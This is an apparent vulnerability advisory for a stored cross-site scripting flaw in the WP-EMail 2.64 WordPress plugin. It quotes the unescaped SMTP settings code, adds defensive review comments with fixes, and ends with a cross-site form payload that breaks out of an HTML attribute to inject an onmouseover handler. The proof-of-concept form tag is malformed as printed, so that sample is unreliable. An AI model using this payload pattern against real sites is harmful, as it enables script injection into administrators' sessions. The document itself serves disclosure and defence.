######################
# Exploit Title : WordPress WP-EMail 2.64 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/wp-email/
# Date : 2015-01-03
# Software Link : https://downloads.wordpress.org/plugin/wp-email.2.64.zip
# Tested on : Windows 7 / Mozilla Firefox
######################
######################
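# Vulnerable code (SMTP settings form; the saved values are echoed into value="..." attributes without HTML-attribute escaping) :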
<?php
/*
 * SMTP settings rows of the WP-EMail options form, shown as in the advisory (unfixed).
 *
 * Each value="..." attribute below is filled with stripslashes($email_smtp[...]) and
 * nothing else. stripslashes() only removes backslashes; it does not encode quotes or
 * angle brackets, so a value containing a double quote ends the attribute and whatever
 * follows is parsed by the browser as further attributes or markup.
 *
 * Mitigation: escape for the attribute context at output, on all three fields, e.g.
 *     echo esc_attr( stripslashes( $email_smtp['username'] ) );
 *
 * NOTE(review): the code that saves $email_smtp is not shown here. Confirm that it
 * verifies a nonce and the current user's capability before storing these fields.
 */
?>
<table class="form-table">
    <tr>
        <th width="20%"><?php _e('SMTP Username:', 'wp-email'); ?></th>
        <td><input type="text" name="email_smtp_name" value="<?php echo stripslashes($email_smtp['username']); ?>" size="30" dir="ltr" /></td>
    </tr>
    <tr>
        <th width="20%"><?php _e('SMTP Password:', 'wp-email'); ?></th>
        <?php /* Same unescaped echo as above. In addition, the saved SMTP password is written
                 back into the page source here; rendering the field empty and keeping the
                 stored secret unless a new one is submitted would avoid exposing it. */ ?>
        <td><input type="password" name="email_smtp_password" value="<?php echo stripslashes($email_smtp['password']); ?>" size="30" dir="ltr" /></td>
    </tr>
    <tr>
        <th width="20%"><?php _e('SMTP Server:', 'wp-email'); ?></th>
        <td><input type="text" name="email_smtp_server" value="<?php echo stripslashes($email_smtp['server']); ?>" size="30" dir="ltr" /><br />
            <?php _e('You may leave the above fields blank if you do not use a SMTP server.', 'wp-email'); ?></td>
    </tr>
</table>
#####################
Exploit Code:
<!--
  Proof-of-concept page from the advisory, reproduced unchanged apart from line layout.

  What it shows for defenders: the email_smtp_name value starts with a double quote. If the
  plugin saves it and later echoes it into value="..." without attribute escaping, the quote
  ends that attribute and the style / onmouseover text is parsed as attributes of the settings
  input. alert(1) is only a marker that script ran in the page.

  NOTE(review): a form posted from another page only takes effect if the settings handler
  accepts it without a valid nonce; that handler is not shown on this page, so confirm it
  against the plugin source.

  Plugin-side fix: esc_attr() on output, plus nonce and capability checks on save.
-->
<html>
<body>
<form method="post"
<input type="hidden" name="email_smtp_name" value='" style="a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;" onmouseover=alert(1); a="'/>
<input type="submit" name="Submit" class="button" value="Save Changes" />
</form>
</body>
</html>